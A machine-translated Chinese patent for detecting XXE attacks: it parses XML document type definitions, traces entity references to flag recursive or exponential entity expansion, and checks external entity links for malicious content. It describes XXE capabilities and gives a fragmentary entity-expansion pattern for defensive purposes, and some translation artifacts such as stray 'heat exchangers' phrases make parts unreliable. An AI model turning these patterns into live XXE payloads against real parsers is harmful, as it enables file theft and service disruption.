CN113127862B - XXE attack detection method and device, electronic equipment and storage medium - Google Patents
XXE attack detection method and device, electronic equipment and storage medium Download PDFInfo
- Publication number
- CN113127862B CN113127862B CN201911414859.6A CN201911414859A CN113127862B CN 113127862 B CN113127862 B CN 113127862B CN 201911414859 A CN201911414859 A CN 201911414859A CN 113127862 B CN113127862 B CN 113127862B
- Authority
- CN
- China
- Prior art keywords
- xxe
- attack
- xml document
- analysis result
- relation
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F2221/00—Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F2221/03—Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
- G06F2221/033—Test or assess software
Abstract
The application discloses a XXE attack detection method, which can obtain the reference relation among entities in an XML document by carrying out grammar analysis on the XML document to be detected, thereby being convenient for judging whether XXE attack exists in the XML document according to the reference relation. Compared with the prior art that the attack prevention XXE can be realized only by prohibiting related functions through instruction sets, the scheme provides a scheme for discovering XXE attack by analyzing XML document content, and further can pertinently prevent and treat XXE attack parts existing in the XML document content, so that normal external entity call can be normally performed, and the influence on normal operation of a system is reduced. The application also discloses a XXE attack detection device, electronic equipment and a readable storage medium, which have the beneficial effects.
Description
Technical Field
The present disclosure relates to the field of malicious content detection, and in particular, to a XXE attack detection method and apparatus, an electronic device, and a readable storage medium.
Background
XXE, english is named XML External Entity, and Chinese is named XML external entity injection. The XML parser can read data from a local file or a remote URI through the XML entity and keywords such as SYSTEM or PUBLIC, so that an attacker can transmit a malicious value constructed by the attacker through the XML entity, and further the processing program can parse the malicious value. When the system refers to an external entity, an attacker can read any file, execute a system command, detect an intranet port, attack an intranet website and the like through constructing malicious content.
The XXE attack in the narrow sense only refers to the attack injected by an external entity, but with the development of technology, the attack modes are also various, and some other types of attacks passing through XML format documents are also commonly called XXE attacks, so that a generalized XXE attack is formed.
However, in the research process, the applicant finds that the prior art does not have a suitable detection means for XXE attack, most of which only mask the function possibly causing XXE attack through the instruction set owned by the XML document itself, and taking PHP language as an example, the invocation of all external entities can be disabled through the instruction set of libxml_disable_entity_loader (true), but this way can prevent malicious external entity injection, and meanwhile, the reference of normal external entities is also stopped, and the reference of normal external entities is also a part of the normal operation of the system, which can affect the normal operation of the system, and the forbidden mode is not different from the self-breaking method.
Therefore, how to provide a scientific and reasonable XXE attack detection mode to better discover and prevent XXE attack is a problem to be solved by those skilled in the art.
Disclosure of Invention
The purpose of the application is to provide a XXE attack detection method, a XXE attack detection device, an electronic device and a readable storage medium, and aims to provide a scientific and reasonable XXE attack detection mode so as to better discover and prevent XXE attacks.
To achieve the above object, the present application first provides a XXE attack detection method, including:
acquiring an XML document to be detected;
carrying out grammar analysis on the XML document to obtain a grammar analysis result;
and detecting whether XXE attack exists according to the grammar analysis result.
Optionally, the parsing the XML document to obtain a parsing result includes:
extracting a document type definition part from the XML document;
analyzing the document type definition part by using a grammar engine to obtain a grammar tree;
and obtaining the reference relation among the entities according to the relation among the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
Optionally, the detecting whether the XXE attack exists according to the parsing result includes:
extracting and obtaining a quotation relation among the entities from the grammar analysis result;
detecting whether DOS attacks in the XXE attacks exist according to the reference relation.
Optionally, the detecting whether the DOS attack in the XXE attack exists according to the reference relation includes:
judging whether the reference relation has cyclic call among different entities or not;
if the cyclic call among different entities exists, determining that the cyclic call attack exists in the DOS attack;
or alternatively, the first and second heat exchangers may be,
judging whether different entities which are expanded according to indexes exist in the quotation relation;
if different entities which are expanded exponentially exist, determining that an exponential expansion attack exists in the DOS attack.
Optionally, the detecting whether the XXE attack exists according to the parsing result includes:
carrying out semantic analysis on the grammar analysis result to obtain a semantic analysis result;
restoring according to the semantic analysis result to obtain a real relationship between the initial entity and the final entity;
screening and obtaining an external call link containing external call in each real relation;
judging whether the external content corresponding to the external call link has malicious content or not;
if malicious content exists, it is determined that an external malicious content injection attack exists in the XXE attack.
Optionally, the obtaining the XML document to be detected includes:
acquiring all data files contained in the flow to be detected;
and screening the content type field or the file header content of each data file to obtain the XML document to be detected.
Optionally, after detecting the presence of the XXE attack, the method further includes:
masking all calls detected as belonging to the target entity of the XXE attack;
and reporting attack prompt information containing the target entity through a preset path.
To achieve the above object, the present application further provides a XXE attack detection device, including:
the XML document acquisition unit to be detected is used for acquiring the XML document to be detected;
the grammar analysis unit is used for carrying out grammar analysis on the XML document to obtain a grammar analysis result;
XXE attack detecting unit for detecting XXE attack according to the grammar analysis result.
Optionally, the syntax analysis unit includes:
a document type definition part extraction subunit configured to extract a document type definition part from the XML document;
a parsing subunit, configured to parse the document type definition portion by using a syntax engine to obtain a syntax tree;
and the reference relation acquisition subunit is used for acquiring the reference relation between the entities according to the relation between the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
Optionally, the XXE attack detection unit includes:
a quotation relation extracting subunit, configured to extract, from the parsing result, a quotation relation between each entity;
and the DOS attack existence detection subunit is used for detecting whether the DOS attack in the XXE attack exists according to the reference relation.
Optionally, the DOS attack presence detection subunit includes:
the cyclic call existence detection module is used for judging whether cyclic call among different entities exists in the reference relation;
the round-robin call attack determining module is used for determining that round-robin call attacks exist in the DOS attack when round calls among different entities exist;
or alternatively, the first and second heat exchangers may be,
the index expansion existence detection module is used for judging whether different entities expanded according to the index exist in the quotation relation;
and the index expansion attack determining module is used for determining that the index expansion attack in the DOS attack exists when different entities which are expanded according to the index exist.
Optionally, the XXE attack detection unit includes:
the semantic analysis subunit is used for carrying out semantic analysis on the grammar analysis result to obtain a semantic analysis result;
a true relationship restoring subunit, configured to restore according to the semantic analysis result to obtain a true relationship between the initial entity and the final entity;
an external call link screening subunit, configured to screen each real relationship to obtain an external call link that includes an external call;
a malicious content judging subunit, configured to judge whether malicious content exists in external content corresponding to the external call link;
an external malicious content injection attack determination subunit configured to determine that an external malicious content injection attack exists in the XXE attack when the malicious content exists.
Optionally, the XML document to be tested obtaining unit includes:
a data file obtaining subunit, configured to obtain all data files included in the flow to be detected;
and the XML document screening subunit is used for screening the content type field or the file header content of each data file to obtain the XML document to be detected.
Optionally, the XXE attack detection device further includes:
a target entity call masking unit for masking all calls detected as belonging to the target entity of the XXE attack after detecting the existence of the XXE attack;
and the attack prompt information reporting subunit is used for reporting the attack prompt information containing the target entity through a preset path.
To achieve the above object, the present application further provides an electronic device, including:
a memory for storing XXE attack detection programs;
a processor for implementing the steps of the XXE attack detection method described above when executing the XXE attack detection program.
To achieve the above object, the present application further provides a readable storage medium, where a XXE attack detection program is stored, where the XXE attack detection program, when executed by a processor, can implement the steps of the XXE attack detection method as described above.
The XXE attack detection method provided by the application comprises the following steps: acquiring an XML document to be detected; carrying out grammar analysis on the XML document to obtain a grammar analysis result; and detecting whether XXE attack exists according to the grammar analysis result.
According to the XXE attack detection method provided by the application, the reference relation among all entities in the XML document can be obtained by carrying out grammar analysis on the XML document to be detected, so that whether XXE attack exists in the XML document can be judged conveniently according to the reference relation. Compared with the prior art that the attack prevention XXE can be realized only by prohibiting related functions through instruction sets, the scheme provides a scheme for discovering XXE attacks through normal analysis of XML document contents, and further can pertinently prevent and process XXE attack parts existing in the XML document contents, so that normal external entity call can be normally performed, and the influence on normal operation of a system is reduced. The application also provides a XXE attack detection device, an electronic device and a readable storage medium, which have the beneficial effects and are not described in detail herein.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings that are required to be used in the embodiments or the description of the prior art will be briefly described below, and it is obvious that the drawings in the following description are only embodiments of the present application, and that other drawings may be obtained according to the provided drawings without inventive effort to a person skilled in the art.
Fig. 1 is a flowchart of a XXE attack detection method provided in an embodiment of the present application;
FIG. 2 is a flowchart of a method for parsing an XML document in a XXE attack detection method provided in an embodiment of the present application;
FIG. 3 is a flowchart of a method for detecting XXE attacks according to a result of syntax analysis in XXE attack detection according to an embodiment of the present application;
FIG. 4 is a flowchart of another method for detecting XXE attacks according to the result of syntax analysis in XXE attack detection according to the embodiment of the present application;
fig. 5 is a flow chart of another XXE attack detection method according to an embodiment of the present disclosure;
fig. 6 is a block diagram of a XXE attack detection device according to an embodiment of the present application.
Detailed Description
The purpose of the application is to provide a XXE attack detection method, a XXE attack detection device, an electronic device and a readable storage medium, and aims to provide a scientific and reasonable XXE attack detection mode so as to better discover and prevent XXE attacks.
For the purposes of making the objects, technical solutions and advantages of the embodiments of the present application more clear, the technical solutions of the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is apparent that the described embodiments are some embodiments of the present application, but not all embodiments. All other embodiments, which can be made by one of ordinary skill in the art without undue burden from the present disclosure, are within the scope of the present disclosure.
Example 1
Referring to fig. 1, fig. 1 is a flowchart of a XXE attack detection method provided in an embodiment of the present application, which includes the following steps:
s101: acquiring an XML document to be detected;
this step aims at obtaining the XML document contained in the flow to be detected.
The English of XML is named Extensible Markup Language, the Chinese name is extensible markup language, and the XML document is formed based on the markup language which is used for marking the electronic file to be structural. Since XXE attacks can only be implemented with the aid of the carrier XML document, it is necessary to first filter the XML document from all traffic to be detected.
The method for screening the XML documents to be detected from all the traffic to be detected includes the following steps:
acquiring all data files contained in the flow to be detected;
and screening the content type field or the file header content of each data file to obtain the XML file to be detected. The content-type field (i.e. content type field) of the XML document is usually application/XML and text/XML, so that judgment and screening can be performed based on the feature; at the same time, the XML document header is based on XML format requirements, which must exist such as <? XML version= "1.0" > and so on, which conform to the XML header declaration specification. Of course, other similar ways may be used to find the feature that can uniquely determine the feature that belongs to the XML document as a basis for determining whether the feature belongs to the XML document, which is not specifically limited herein.
S102: carrying out grammar analysis on the XML document to obtain a grammar analysis result;
on the basis of S101, this step aims at parsing the XML document obtained by screening, so as to obtain a parsing result that facilitates subsequent determination of whether XXE attack exists.
The present step is directed to parsing of an XML document in order to extract the entities contained in the XML document and the reference relationships between the entities. For example, entity a references entity B and entity C references entity D, where each entity has its corresponding interpretation, and references between entities are also to enable multiplexing of interpretations. In the text <)! For example, the ENTITY name 'John' can parse out that the text string is defined as a DTD ENTITY, the ENTITY name is name, and the content pointed to is the character string 'John'.
The extraction of the reference relationships between the entities by syntax analysis is variously implemented, and one implementation, including but not limited to, can be seen in the flowchart shown in fig. 2, which includes the following steps:
s201: extracting a document type definition part from the XML document;
the document type definition part is also commonly referred to as a DTD part for an expert, wherein DTD is an abbreviation of english acronym Document Type Definitions, and the DTD part defines a legal building block of an XML document, and includes a DTD entity (the DTD entity is a variable for defining a shortcut for referencing a common text or a special character, and may be internally declared or externally referenced). In addition to the DTD portion, the XML document typically includes two remaining portions, an extensible style language (Extensible Style Language, XSL) -the style sheet language of XML, and an extensible link language (Extensible Link Language, XLL), respectively.
S202: analyzing the document type definition part by using a grammar engine to obtain a grammar tree;
on the basis of S201, this step aims to parse the content of the DTD part by the syntax engine, thereby obtaining a syntax tree as a result of the parsing.
S203: and obtaining the reference relation among the entities according to the relation among the entities on the grammar tree, and taking the reference relation as a grammar analysis result.
On the basis of S202, this step aims to obtain a reference relationship according to the relationship between entities on the syntax tree, that is, the reference relationship between DTD entities, through the hierarchical relationship between DTD entities presented on the syntax tree.
S103: and detecting whether XXE attack exists according to the grammar analysis result.
On the basis of S102, this step aims to detect whether there is a XXE attack according to the obtained syntax analysis result. Based on the reference relationship between the DTD entities included in the syntax analysis result, detection of most of the main stream XXE attacks can be achieved through different processes, for example, DOS sub-class attacks in XXE attacks directly based on the reference relationship, or the reference relationship between the entities is reprocessed and then restored to obtain an interpretation relationship between the source entity and the final entity, so that attack detection such as external entity injection of malicious content in XXE attacks can be conveniently performed.
Further, if the detection in S103 determines that the XML document has a XXE attack, all calls of the target entity detected as belonging to the XXE attack can be timely shielded, and at the same time, the attack prompt information including the target entity can be further preferably reported through the preset path, and timely processing can be performed, so as to avoid the XXE attack from invading the network and causing harm. Specifically, the preset path may include an interface pop-up window, a mail, a short message, and various instant messaging applications.
Based on the XXE attack detection scheme provided by the embodiment, the application can obtain the reference relation among the entities in the XML document by carrying out grammar analysis on the XML document to be detected, so that whether XXE attack exists in the XML document can be conveniently judged according to the reference relation. Compared with the prior art that the attack prevention XXE can be realized only by prohibiting related functions through instruction sets, the scheme provides a scheme for discovering XXE attacks through normal analysis of XML document contents, and further can pertinently prevent and process XXE attack parts existing in the XML document contents, so that normal external entity call can be normally performed, and the influence on normal operation of a system is reduced.
Example two
On the basis of the first embodiment, the present embodiment provides a way to determine, according to the result of the parsing, whether there is a DOS subclass attack in the XXE attack in the XML document, for S103, please refer to the flowchart shown in fig. 3, including the following steps:
s301: extracting and obtaining a quotation relation among the entities from the grammar analysis result;
s302: a DOS attack in the XXE attack is detected based on the reference relationship.
DOS is a short term for Denial of Service, i.e., denial of service, and the attack that causes DOS is called DOS attack, whose purpose is to disable a computer or network from providing normal services. The most common DOS attacks are computer network broadband attacks and connectivity attacks. DOS attacks refer to the defect of intentional attack network protocol implementation or the direct brute force exhaustion of the resources of an attacked object, aiming at making the target computer or network unable to provide normal service or resource access, and making the target system service stop responding or even crashing, where the attack does not include intrusion into the target server or target network device. These service resources include network bandwidth, file system space capacity, open processes, or allowed connections. Such attacks can result in starvation of resources, and the consequences of such attacks cannot be avoided no matter how fast the computer is being processed, the memory capacity is large, and the network bandwidth is fast.
There are a variety of DOS attacks that can be made based on referential relationships, of which loop calls and exponential expansions are more common, where loop calls can be understood simply as such as: the entity A calls the entity B, and the entity B returns to call the entity A, so that the calling operation is continuously carried out once the cyclic calling occurs, and dead circulation is caused, and the network equipment is caused to report errors, downtime and the like; the exponential expansion can then be understood simply as: one entity invokes another entity multiple times, taking two times as an example: entity A invokes entity B twice, e.g. < -! ENTITY A "& B; & B; entity B calls entity C twice again, entity C calls entity D twice, thus occupying a large amount of computing resources, and as the call is continuously expanded, all computing resources are finally squeezed out, and network equipment is halted and even hardware is damaged.
The two different cases can be respectively realized through the following two specific operations:
and (3) loop call detection: judging whether the reference relation has cyclic call among different entities or not; if the loop call among different entities exists, determining that the loop call attack in the DOS attack exists.
And (3) exponential expansion detection: judging whether different entities which are expanded according to indexes exist in the quotation relation; if there are different entities that are exponentially expanded, it is determined that there is an exponential expansion attack in the DOS attack. Specifically, the criterion for exponential expansion detection can be set to 3 layers according to the actual situation and the discrimination accuracy in the discrimination, i.e. the reference relationship is determined to belong to exponential expansion attack as long as 2 layers or more exponential expansion are found.
Further, in addition to the above case that can be identified as a XXE attack, other cases can be identified based on the following other strategies: whether the length of the variable name or value is too long (an excessively long variable name or value may cause the XML document to be unrecognized or cause the recognition mechanism to report errors and crash); whether the number of entity references is excessive, both of which also belong to one way of DOS subclass attack.
Example III
On the basis of the first embodiment, the present embodiment provides a way to determine, according to the result of the parsing, whether the malicious content in the XXE attack exists in the XML document in an attempt to implement the attack by the external injection, with reference to the flowchart shown in fig. 4, which includes the following steps:
s401: carrying out semantic analysis on the semantic analysis result to obtain a semantic analysis result;
s402: restoring according to the semantic analysis result to obtain a real relationship between the initial entity and the final entity;
the semantic analysis is an analysis mode based on the prior grammar analysis, and aims to explain and restore the reference relation among the entities extracted through the grammar analysis according to the reference sequence, and finally obtain the real relation between the initial entity and the final entity.
In the text <)! EntityName 'John' and < -! ENTITY green' This is & name; ' for example, < -! EntityName 'John' is a name ENTITY defining an explanation, specifically John, < -! ENTITY green' This is & name; ' is that the real relationship of the entity ' is John ' can be obtained by referencing the name entity so that the interpretation of the entity is docked after the entity ' is ', namely finally through semantic analysis. In practice applications between entities can be extremely complex, and attackers often use this to hide the actual content of the entities. Thus, by recovering malicious content in the data packet, subsequent detection may be facilitated.
S403: screening and obtaining an external call link containing external call in each real relation;
on the basis of S402, the real relationships are restored through semantic analysis, so that whether the external call belongs to the real relationships is clear at a glance, and the step aims at obtaining an external call link containing the external call by screening each real relationship.
S404: judging whether the external content corresponding to the external call link has malicious content or not, if so, executing S405, otherwise, executing S406;
s405: determining that an external malicious content injection attack exists in the XXE attack;
s406: it is determined that there is no external malicious content injection attack in the XXE attack.
S404, S405 and S406 are executed to determine whether the external call belongs to the view through the attack of the external call such as XXE of the malicious content by linking the external call with the corresponding external content. In particular, the determination of malicious content may be performed in a variety of ways, such as by features, website domain names, etc., which are not specifically described herein.
Further, in addition to the above discrimination mechanism based on the link to the external call, it may also include discriminating whether some internal sensitive files (these corresponding to the illegal accesses of XXE) are applied to the entity view based on the restored true relationship, if it is found that it references the internal sensitive files that should not be referenced, it may also be considered to be XXE attacked to some extent.
Furthermore, in order to avoid false alarms caused by improper discrimination as far as possible, a false alarm rejection mechanism may be added, for example, a legal domain name library is used to perform legal discrimination on the domain name in XXE attack. False alarms can be eliminated by adding a white list to the domain name library when the false alarms occur. The false alarm elimination mechanism is beneficial to controlling the false alarm of the whole XXE attack detection mechanism and reducing the influence on a customer service system.
Meanwhile, in consideration of continuous improvement and compiling of attack means, the characteristics serving as criteria can be processed by means of a deep learning algorithm or a machine learning algorithm so as to conveniently identify the simple and adjusted attacks of the same type.
In order to facilitate understanding of the scheme, the application further provides a complete flow diagram of XXE attack detection and processing, which is shown in the flow diagram of fig. 5, firstly identifies XML documents for the flow to be detected, sequentially carries out grammar and semantic analysis for the XML documents, divides the XML documents into black XML documents and white XML documents under the detection and discrimination of a black-judging strategy (namely, discriminating which XXE attacks exist, wherein 'black' refers to malicious content, and 'white' refers to normal content opposite to the malicious content) based on the final analysis result, and executes interception operation for the black XML documents to prevent the black XML documents from entering a network to cause harm, and the white XML documents are released to enable the normal content to be executed.
Because of the complexity and cannot be illustrated by one, those skilled in the art will recognize that many examples exist in accordance with the basic method principles provided herein in combination with actual situations, which are within the scope of the present application without significant inventive effort.
Referring to fig. 6, fig. 6 is a block diagram of a XXE attack detection device according to an embodiment of the present application, where the device may include:
an XML document to be detected acquisition unit 100 for acquiring an XML document to be detected;
a parsing unit 200, configured to parse the XML document to obtain a parsing result;
XXE attack detection unit 300 is configured to detect whether there is a XXE attack according to the parsing result.
The parsing unit 200 may include:
a document type definition part extraction subunit configured to extract a document type definition part from the XML document;
a parsing subunit, configured to parse the document type definition portion by using a syntax engine to obtain a syntax tree;
and the reference relation acquisition subunit is used for acquiring the reference relation between the entities according to the relation between the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
The XXE attack detecting unit 300 may include:
a quotation relation extracting subunit, configured to extract, from the parsing result, a quotation relation between each entity;
and the DOS attack existence detection subunit is used for detecting whether the DOS attack in the XXE attack exists according to the reference relation.
Wherein the DOS attack presence detection subunit may include:
the cyclic call existence detection module is used for judging whether cyclic call among different entities exists in the reference relation;
the round-robin call attack determining module is used for determining that round-robin call attacks exist in the DOS attack when round calls among different entities exist;
or alternatively, the first and second heat exchangers may be,
the index expansion existence detection module is used for judging whether different entities expanded according to the index exist in the quotation relation;
and the index expansion determining module is used for determining that the index expansion attack in the DOS attack exists when different entities which are expanded according to the index exist.
The XXE attack detecting unit 300 may include:
the semantic analysis subunit is used for carrying out semantic analysis on the grammar analysis result to obtain a semantic analysis result;
a true relationship restoring subunit, configured to restore according to the semantic analysis result to obtain a true relationship between the initial entity and the final entity;
an external call link screening subunit, configured to screen each real relationship to obtain an external call link that includes an external call;
a malicious content judging subunit, configured to judge whether malicious content exists in external content corresponding to the external call link;
an external malicious content injection attack determination subunit configured to determine that an external malicious content injection attack exists in the XXE attack when the malicious content exists.
The XML document acquisition unit 100 to be tested may include:
a data file obtaining subunit, configured to obtain all data files included in the flow to be detected;
and the XML document screening subunit is used for screening the content type field or the file header content of each data file to obtain the XML document to be detected.
Further, the XXE attack detection device may further include:
a target entity call masking unit for masking all calls detected as belonging to the target entity of the XXE attack after detecting the existence of the XXE attack;
and the attack prompt information reporting subunit is used for reporting the attack prompt information containing the target entity through a preset path.
The present embodiment exists as an embodiment of the apparatus corresponding to the above embodiment of the method, and has all the beneficial effects of the method embodiment, which are not described herein in detail.
Based on the above embodiment, the present application further provides an electronic device, where the electronic device may include a memory and a processor, where the memory stores a computer program, and the processor may implement the steps provided in the above embodiment when calling the computer program in the memory. Of course, the electronic device may also include various necessary network interfaces, power supplies, and other components, etc.
The present application also provides a readable storage medium having stored thereon a computer program which, when executed by an execution terminal or a processor, can implement the steps provided by the above embodiments. The storage medium may include: a U-disk, a removable hard disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk, or other various media capable of storing program codes.
In the description, each embodiment is described in a progressive manner, and each embodiment is mainly described by the differences from other embodiments, so that the same similar parts among the embodiments are mutually referred. For the device disclosed in the embodiment, since it corresponds to the method disclosed in the embodiment, the description is relatively simple, and the relevant points refer to the description of the method section.
Those of skill would further appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, computer software, or combinations of both, and that the various illustrative elements and steps are described above generally in terms of functionality in order to clearly illustrate the interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the solution. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
Specific examples are set forth herein to illustrate the principles and embodiments of the present application, and the description of the examples above is only intended to assist in understanding the methods of the present application and their core ideas. It will be apparent to those skilled in the art that various changes and modifications can be made herein without departing from the principles of the application, which are intended to be covered by the appended claims.
It should also be noted that in this specification, relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Moreover, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or apparatus that comprises an element.
Claims (9)
1. A XXE attack detection method, comprising:
acquiring an XML document to be detected;
carrying out grammar analysis on the XML document to obtain a grammar analysis result; the grammar analysis result comprises the quotation relation among the entities in the XML document;
detecting whether XXE attack exists according to the grammar analysis result;
wherein, the detecting whether XXE attack exists according to the syntax analysis result comprises: judging whether XXE attack exists in the XML document according to the reference relation;
and, the parsing the XML document to obtain a parsing result includes: extracting a document type definition part from the XML document; analyzing the document type definition part by using a grammar engine to obtain a grammar tree; and obtaining the reference relation among the entities according to the relation among the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
2. The XXE attack detection method according to claim 1, wherein said detecting whether there is a XXE attack based on the result of the parsing includes:
extracting and obtaining a quotation relation among the entities from the grammar analysis result;
detecting whether DOS attacks in the XXE attacks exist according to the reference relation.
3. The XXE attack detection method according to claim 2, wherein said detecting whether there is a DOS attack in the XXE attack according to the reference relation comprises:
judging whether the reference relation has cyclic call among different entities or not;
if the cyclic call among different entities exists, determining that the cyclic call attack exists in the DOS attack;
or alternatively, the first and second heat exchangers may be,
judging whether different entities which are expanded according to indexes exist in the quotation relation;
if different entities which are expanded exponentially exist, determining that an exponential expansion attack exists in the DOS attack.
4. The XXE attack detection method according to claim 1, wherein said detecting whether there is a XXE attack based on the result of the parsing includes:
carrying out semantic analysis on the grammar analysis result to obtain a semantic analysis result;
restoring according to the semantic analysis result to obtain a real relationship between the initial entity and the final entity;
screening and obtaining an external call link containing external call in each real relation;
judging whether the external content corresponding to the external call link has malicious content or not;
if malicious content exists, it is determined that an external malicious content injection attack exists in the XXE attack.
5. The XXE attack detection method according to claim 1, wherein said obtaining an XML document to be detected comprises:
acquiring all data files contained in the flow to be detected;
and screening the content type field or the file header content of each data file to obtain the XML document to be detected.
6. The XXE attack detection method according to any one of claims 1 to 5, further comprising, after detecting the presence of said XXE attack:
masking all calls detected as belonging to the target entity of the XXE attack;
and reporting attack prompt information containing the target entity through a preset path.
7. A XXE attack detection device comprising:
the XML document acquisition unit to be detected is used for acquiring the XML document to be detected;
the grammar analysis unit is used for carrying out grammar analysis on the XML document to obtain a grammar analysis result; the grammar analysis result comprises the quotation relation among the entities in the XML document;
XXE attack detecting unit for detecting XXE attack according to the grammar analysis result;
the XXE attack detection unit is specifically configured to determine whether XXE attack exists in the XML document according to the reference relationship;
and, the syntax analysis unit includes:
a document type definition part extraction subunit configured to extract a document type definition part from the XML document;
a parsing subunit, configured to parse the document type definition portion by using a syntax engine to obtain a syntax tree;
and the reference relation acquisition subunit is used for acquiring the reference relation between the entities according to the relation between the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
8. An electronic device, comprising:
a memory for storing XXE attack detection programs;
a processor for implementing the steps of the XXE attack detection method of any one of claims 1 to 6 when executing the XXE attack detection program.
9. A readable storage medium, wherein a XXE attack detection program is stored on the readable storage medium, which XXE attack detection program, when executed by a processor, implements the steps of the XXE attack detection method of any of claims 1 to 6.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911414859.6A CN113127862B (en) | 2019-12-31 | 2019-12-31 | XXE attack detection method and device, electronic equipment and storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911414859.6A CN113127862B (en) | 2019-12-31 | 2019-12-31 | XXE attack detection method and device, electronic equipment and storage medium |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN113127862A CN113127862A (en) | 2021-07-16 |
| CN113127862B true CN113127862B (en) | 2023-05-12 |
Family
ID=76770475
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201911414859.6A Active CN113127862B (en) | 2019-12-31 | 2019-12-31 | XXE attack detection method and device, electronic equipment and storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN113127862B (en) |
Families Citing this family (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115174244A (en) * | 2022-07-14 | 2022-10-11 | 湖北天融信网络安全技术有限公司 | Safety detection method and system |
| CN117294527B (en) * | 2023-11-22 | 2024-02-27 | 北京微步在线科技有限公司 | Attack judging method, device, storage medium and equipment |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2017056121A1 (en) * | 2015-09-28 | 2017-04-06 | Minded Security S.R.L. | Method for the identification and prevention of client-side web attacks |
| CN109067813A (en) * | 2018-10-24 | 2018-12-21 | 腾讯科技(深圳)有限公司 | Network hole detection method, device, storage medium and computer equipment |
| CN110532779A (en) * | 2019-07-19 | 2019-12-03 | 中移(杭州)信息技术有限公司 | A kind of method, apparatus of Hole Detection, terminal and storage medium |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US10805345B2 (en) * | 2017-09-29 | 2020-10-13 | Paypal, Inc. | Blind injection attack mitigation |
| US10764319B2 (en) * | 2017-10-05 | 2020-09-01 | Honeywell International Inc. | Intelligent automated security vulnerability detection and analysis for industrial internet of things (IIOT) devices |
-
2019
- 2019-12-31 CN CN201911414859.6A patent/CN113127862B/en active Active
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2017056121A1 (en) * | 2015-09-28 | 2017-04-06 | Minded Security S.R.L. | Method for the identification and prevention of client-side web attacks |
| CN109067813A (en) * | 2018-10-24 | 2018-12-21 | 腾讯科技(深圳)有限公司 | Network hole detection method, device, storage medium and computer equipment |
| CN110532779A (en) * | 2019-07-19 | 2019-12-03 | 中移(杭州)信息技术有限公司 | A kind of method, apparatus of Hole Detection, terminal and storage medium |
Non-Patent Citations (4)
| Title |
|---|
| A Guide to XML eXternal Entity Processing;Rachel Hogue;《cs.tufts.edu》;20151231;第1-10页 * |
| XML解析安全问题及对策研究;顾韵华等;《计算机安全》;20091115(第11期);全文 * |
| XXE漏洞及其防御策略研究;应宗浩等;《科技风》;20180705(第19期);全文 * |
| 一种基于SOA的SOAP消息安全传输机制;华悦等;《计算机科学》;20120615(第06期);全文 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN113127862A (en) | 2021-07-16 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US20040205411A1 (en) | Method of detecting malicious scripts using code insertion technique | |
| CN111835777B (en) | Abnormal flow detection method, device, equipment and medium | |
| EP1560112A1 (en) | Detection of files that do not contain executable code | |
| CN111726364B (en) | Host intrusion prevention method, system and related device | |
| CN113127862B (en) | XXE attack detection method and device, electronic equipment and storage medium | |
| CN109688137A (en) | A kind of detection method, system and the associated component of SQL injection attack | |
| CN105357179A (en) | Network attack handling method and network attack handling device | |
| CN111368289A (en) | Malicious software detection method and device | |
| CN113055399A (en) | Attack success detection method, system and related device for injection attack | |
| CN101895517B (en) | Method and device for extracting script semantics | |
| KR100670209B1 (en) | Device of analyzing web application source code based on parameter status tracing and method thereof | |
| CN109753819B (en) | Method and device for processing access control policy | |
| CN113067792A (en) | XSS attack identification method, device, equipment and medium | |
| CN111245899A (en) | Method and system for processing illegal message in web service environment | |
| CN114091031A (en) | Class loading protection method and device based on white rule | |
| CN113138913A (en) | Java code injection detection method, device, equipment and storage medium | |
| CN115913655A (en) | Shell command injection detection method based on flow analysis and semantic analysis | |
| CN115442109A (en) | Method, device, equipment and storage medium for determining network attack result | |
| CN115499211A (en) | Rule generation method and generation device based on flow characteristics | |
